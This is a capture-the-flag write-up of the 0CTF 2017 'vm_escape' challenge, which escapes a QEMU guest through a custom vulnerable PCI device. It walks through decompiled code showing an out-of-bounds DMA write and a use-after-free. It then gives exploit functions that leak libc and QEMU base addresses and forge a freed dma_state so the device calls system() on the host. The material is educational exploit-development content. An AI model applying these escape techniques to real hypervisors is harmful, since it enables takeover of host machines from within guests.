QEMU Escape --- vm_escape from 0CTF 2017 Finals Writeup

Jun 16, 2017 in writeups

It’s a great challenge to get familiar with QEMU escape. We are going to exploit QEMU via a custom vulnerable device.

You should read VM escape - QEMU Case Study before reading this writeup.

Challenge

challenge
├── dependency
│   ├── libnettle.so.6.2
│   └── usr
│       └── local
│           └── share
│               └── qemu
│                   ├── bios-256k.bin
│                   ├── efi-e1000.rom
│                   ├── kvmvapic.bin
│                   ├── linuxboot_dma.bin
│                   └── vgabios-stdvga.bin
├── launch.sh
├── qemu-system-x86_64
├── rootfs.cpio
└── vmlinuz-4.8.0-52-generic

There is a qemu-system-x86_64 binary with a launch script, a Linux kernel, an initramfs and some dependencies.

We can get an interactive shell by executing launch.sh.

    __ __ _____________   __   __    ___    ____
   / //_// ____/ ____/ | / /  / /   /   |  / __ )
  / ,<  / __/ / __/ /  |/ /  / /   / /| | / __  |
 / /| |/ /___/ /___/ /|  /  / /___/ ___ |/ /_/ /
/_/ |_/_____/_____/_/ |_/  /_____/_/  |_/_____/

Welcome to Tencent Keenlab
Tencent login: root
# uname -r
4.8.0-52-generic
#

The custom vulnerable device

launch.sh shows that there are two custom devices named vdd.

$ ./qemu-system-x86_64 -device help 2>&1 | grep VDD
name "VDD", bus PCI, desc "KeenLab virtualized Devices For Testing D"

We can use the following commands to find these devices and their I/O port and memory ranges.

# lspci
00:00.0 Class 0600: 8086:1237
00:01.3 Class 0680: 8086:7113
00:03.0 Class 0200: 8086:100e
00:01.1 Class 0101: 8086:7010
00:02.0 Class 0300: 1234:1111
00:05.0 Class 00ff: 1234:2333
00:01.0 Class 0601: 8086:7000
00:04.0 Class 00ff: 1234:2333
# cat /proc/iomem
...
  fe900000-fe9fffff : 0000:00:04.0
  fea00000-feafffff : 0000:00:05.0
...
# cat /proc/ioports
...
  c000-c0ff : 0000:00:04.0
  c100-c1ff : 0000:00:05.0
...

OOBW

In vdd_mmio_write, there is an out-of-bounds vulnerability: when we set dma_len larger than sizeof(dma_buf), the device copies QEMU heap memory beyond the end of dma_buf into guest physical memory.

/*
 * vdd_mmio_write -- decompiler output, excerpt ("..." marks elided code).
 *
 * Only the addr == 32 case is shown: it invokes the function pointer
 * dma_state->phys_mem_write with dma_buf, dma_state->dst and dma_len as its
 * three arguments.  Nothing is done at all when opaque->dma_state is NULL.
 */
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax@21

  if ( opaque->dma_state )
  {
    ...
    else
    {
      switch ( addr )
      {
        ...
        case 32uLL:
          // dma_len is passed through as-is in this excerpt: no mask and no
          // comparison against the size of dma_buf is visible (vdd_dma_timer,
          // by contrast, applies "& 0x2FF" to the same field).
          ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
            opaque->dma_buf,
            opaque->dma_state->dst,
            opaque->dma_len);                   // OOB write
          break;
        ...
      }
    }
  }
}

UAF

Also in vdd_mmio_write, if addr == 128 and (opaque->sr[129] & 1) != 0, we can arm a timer that will execute vdd_dma_timer opaque->expire_time ns later.

/*
 * vdd_mmio_write -- decompiler output, second excerpt ("..." marks elided
 * code; the elision also swallows a closing brace, so the braces below do not
 * balance).
 *
 * Only the addr == 128 case is shown: when bit 0 of opaque->sr[129] is set,
 * dma_timer is (re)armed to fire opaque->expire_time ns after the current
 * clock reading.
 */
void __fastcall vdd_mmio_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  int64_t v4; // rax@21

  if ( opaque->dma_state )
  {
    ...
    else if ( addr > 0x24 )
    {
      if ( addr == 128 )
      {
        if ( opaque->sr[129] & 1 )
        {
          // v4 = current time in ns of clock type 0; the deadline is that
          // plus the guest-visible expire_time field.
          v4 = qemu_clock_get_ns(0);
          timer_mod(&opaque->dma_timer, v4 + opaque->expire_time);
        }
      }
      ...
  }
}

In vdd_dma_timer, it invokes opaque->dma_state->phys_mem_read/write.

/*
 * vdd_dma_timer -- decompiler output of the dma_timer callback.
 *
 * Dispatches through one of two function pointers stored in
 * opaque->dma_state, chosen by dma_state->cmd:
 *   cmd != 0  -> dma_state->phys_mem_read(dma_buf, dst, dma_len & 0x2FF)
 *   cmd == 0  -> dma_state->phys_mem_write(dma_buf, dst, dma_len & 0x2FF)
 * Afterwards, if cmd == 1, it calls vdd_raise_irq(opaque, 0x100).
 *
 * opaque->dma_state is dereferenced without a NULL check in this function.
 */
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
  if ( opaque->dma_state->cmd )
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  else
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  // cmd is read again here, after the indirect call has returned.
  if ( opaque->dma_state->cmd == 1 )
    vdd_raise_irq(opaque, 0x100u);
}

If pci_vdd_uninit is invoked while the timer is still pending, dma_state is freed but the pointer is left in place, so vdd_dma_timer will use dma_state after it has been freed.

/*
 * pci_vdd_uninit -- decompiler output of the device teardown routine.
 *
 * Zeroes the 0x100-byte sr array, then zeroes and frees dma_state (0x330
 * bytes) and frees buf, each only if non-NULL.
 *
 * Neither opaque->dma_state nor opaque->buf is reset to NULL after g_free,
 * and no call that cancels dma_timer appears in this function.
 */
void __fastcall pci_vdd_uninit(TencentPCIState *opaque)
{
  __int64 v1; // rax@5
  __int64 v2; // [rsp+28h] [rbp-8h]@1

  // Reads the qword at FS:40 -- presumably the stack-protector canary
  // (decompiler artifact; confirm against the disassembly).
  v2 = *MK_FP(__FS__, 40LL);
  memset(opaque->sr, 0, 0x100uLL);
  if ( opaque->dma_state )
  {
    memset(opaque->dma_state, 0, 0x330uLL);
    g_free((rcu_head *)opaque->dma_state);   // pointer stays dangling
  }
  if ( opaque->buf )
    g_free((rcu_head *)opaque->buf);
  // Compares the FS:40 value against the copy saved on entry.
  v1 = *MK_FP(__FS__, 40LL) ^ v2;
}

Exploitation

The exploitation is divided into two steps:

leak QEMU program address.
hijack control flow

Leak QEMU program address

First, we allocate a buffer and get its physical address. Then we set dma_state->dst to our buffer and set dma_len larger than sizeof(dma_buf). Finally, we trigger phys_mem_write by writel(0, piomem + 32). By searching the output, we can find libc addresses and program addresses, and then calculate the base addresses of the program and libc.

/*
 * Ask the device to copy `len` bytes starting at its dma_buf into guest
 * physical memory at `dst`.
 *
 * The destination and length registers are programmed first; the final MMIO
 * write to offset 32 is what makes the device's vdd_mmio_write handler call
 * dma_state->phys_mem_write.  The order of the three steps must not change.
 */
void phys_mem_write(unsigned int dst, unsigned int len)
{
    /* MMIO offset handled by "case 32" in vdd_mmio_write. */
    enum { VDD_MMIO_TRIGGER_WRITE = 32 };

    set_dmastate_dst(dst);
    set_dmalen(len);

    writel(0, piomem + VDD_MMIO_TRIGGER_WRITE);
}

/*
 * Leak QEMU heap contents into a guest buffer and derive the host addresses
 * the exploit needs.
 *
 * Allocates a 0x10000-byte kernel buffer, has the device dump 0x1000 bytes
 * (starting at its dma_buf) into it, then scans the dump for a libc pointer
 * and a QEMU-binary pointer.  Results are stored in the globals libc_base,
 * prog_base and system_addr; pbuf is kept for later reuse by the exploit.
 *
 * On allocation failure the function logs a message and returns without
 * touching the device or the result globals.
 */
void mem_leak(void)
{
    pbuf = (unsigned long)kmalloc(0x10000, GFP_KERNEL);
    if (!pbuf) {
        /* kmalloc can fail; memset() and the scans below would oops on NULL. */
        printk("mem_leak: kmalloc failed\n");
        return;
    }
    /* Start from a clean buffer so only leaked bytes are non-zero. */
    memset(pbuf, 0, 0x10000);
    phys_mem_write(virt_to_phys(pbuf), 0x1000);
    // xxd(pbuf, 0x1000);
    libc_base = search_libc_addr(pbuf, 0x1000);
    printk("libc base:0x%lx\n", libc_base);
    prog_base = search_prog_addr(pbuf, 0x1000);
    printk("program base:0x%lx\n", prog_base);
    /* system_addr is computed relative to the QEMU binary, not libc. */
    system_addr = prog_base + SYSTEM_OFFSET;
    printk("system addr:0x%lx\n", system_addr);
}

Control RIP

There are three steps to exploit the use-after-free vulnerability:

set a timer
trigger pci_vdd_uninit
reallocate and rewrite dma_state

The following command can trigger pci_vdd_uninit

echo 0 > /sys/bus/pci/slots/4/power

When vdd_dma_timer runs, we can control rip.

/*
 * vdd_dma_timer -- decompiler output of the dma_timer callback (repeated
 * here to show where control flow is taken over).
 *
 * Both branches are indirect calls through pointers stored inside
 * opaque->dma_state (phys_mem_read when cmd != 0, phys_mem_write when
 * cmd == 0).  The first argument of either call is opaque->dma_buf.
 */
void __fastcall vdd_dma_timer(TencentPCIState *opaque)
{
  if ( opaque->dma_state->cmd )
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_read)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  else
    ((void (__fastcall *)(char *, dma_addr_t, _QWORD))opaque->dma_state->phys_mem_write)(
      opaque->dma_buf,
      opaque->dma_state->dst,
      opaque->dma_len & 0x2FF);
  // The interrupt is raised only for cmd == 1; any other value skips it.
  if ( opaque->dma_state->cmd == 1 )
    vdd_raise_irq(opaque, 0x100u);
}

Because QEMU is launched with --nographic -append 'console=ttyS0', we can simply invoke system(cmd) to run a command on the host machine, and its output will show up in the console.

To invoke system(cmd), we need to:

set opaque->dma_state->phys_mem_read to system
set opaque->dma_buf to cmd
make sure opaque->dma_state->cmd != 0.

In vdd_linear_write, when addr == 0, a buffer of size opaque->dma_len is allocated. Then opaque->dma_len bytes are copied from opaque->dma_state->src into opaque->buf, and from there to opaque->dma_state->dst.

/*
 * vdd_linear_write -- decompiler output, excerpt ("..." marks elided code).
 *
 * Handles writes with addr <= 13 while dma_state is non-NULL.  Only case 0
 * is shown: it replaces opaque->buf with a fresh zeroed allocation of
 * dma_len bytes, fills it from dma_state->src and copies it on to
 * dma_state->dst.
 */
void __fastcall vdd_linear_write(TencentPCIState *opaque, hwaddr addr, uint64_t val, unsigned int size)
{
  if ( opaque->dma_state && addr <= 13 )
  {
    // The switch expression looks like a decompiled jump-table lookup
    // indexed by addr -- NOTE(review): confirm case numbering against the
    // disassembly.
    switch ( (_DWORD)((char *)off_6EF324 + off_6EF324[addr]) )
    {
      case 0:
        if ( opaque->buf )
          g_free((rcu_head *)opaque->buf);
        // Allocation size comes straight from dma_len.
        opaque->buf = (uint8_t *)g_malloc0(opaque->dma_len);
        vdd_dma_read(opaque->buf, opaque->dma_state->src, opaque->dma_len);
        vdd_dma_write(opaque->buf, opaque->dma_state->dst, opaque->dma_len);
        break;
      ...
    }
  }
}

/*
 * Stage a forged dma_state in guest memory and have the device copy it into
 * a freshly allocated host buffer.
 *
 * The forged structure has cmd = 2 and phys_mem_read = system_addr:
 *   - cmd != 0 makes vdd_dma_timer take the phys_mem_read branch;
 *   - cmd != 1 makes it skip vdd_raise_irq afterwards.
 * All remaining fields are zero.
 *
 * dma_len is set to 0x330, the same size pci_vdd_uninit clears before freeing
 * dma_state, so the g_malloc0(dma_len) in vdd_linear_write requests a chunk
 * of matching size -- presumably to get the freed dma_state chunk back.
 *
 * Relies on the globals pbuf and system_addr having been set up beforehand.
 */
void put_fake_dma(void)
{
    struct dma fakedma;

    /*
     * Zero the whole structure first: the memcpy below copies sizeof(fakedma)
     * bytes, and without this every field other than cmd and phys_mem_read
     * would be uninitialised stack contents.
     */
    memset(&fakedma, 0, sizeof(fakedma));
    fakedma.cmd = 2;
    fakedma.phys_mem_read = system_addr;
    memcpy(pbuf, (void *)&fakedma, sizeof(fakedma));
    set_dmalen(0x330);
    /* Source and destination are the same guest buffer; only the host-side
     * copy into the new allocation matters here. */
    set_dmastate_src(virt_to_phys(pbuf));
    set_dmastate_dst(virt_to_phys(pbuf));
    /* Port write at offset 0 -- NOTE(review): expected to reach the addr == 0
     * case of vdd_linear_write; confirm the port-to-handler mapping. */
    outb(0, VDB_PORT + 0);
}

Exploit script

Thanks for Atum’s help.

Comment and share